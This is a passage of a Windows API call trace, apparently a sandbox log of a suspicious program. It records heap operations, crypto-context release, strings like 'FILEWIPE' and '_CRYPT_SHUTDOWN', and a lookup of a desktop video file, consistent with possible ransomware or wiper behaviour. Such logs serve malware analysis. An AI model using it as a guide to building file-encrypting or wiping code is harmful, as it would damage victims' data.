(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.420] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.420] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.420] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.420] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.420] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.420] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.421] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0168.421] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.421] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.421] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0168.421] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.421] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.421] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.422] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.422] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.422] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.422] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.422] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.422] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.422] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.422] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.423] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.423] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.423] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0168.424] FreeLibrary (hLibModule=0x74f20000) returned 1 [0168.424] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.424] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.424] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0168.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.425] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0168.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.437] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.439] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.439] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0168.439] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.439] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.440] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x52b3ff80, ftLastWriteTime.dwHighDateTime=0x1d5dff4, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 0x90ae18 [0168.440] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.440] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0168.442] CharLowerBuffW (in: lpsz="byte[19894]", cchLength=0xb | out: lpsz="byte[19894]") returned 0xb [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4db6) returned 0x8fff00 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0168.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0168.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.444] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0168.444] TranslateMessage (lpMsg=0x87f36c) returned 0 [0168.444] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0168.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.444] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0168.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.447] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0168.447] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0168.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.448] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0168.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.448] HeapFree (in: 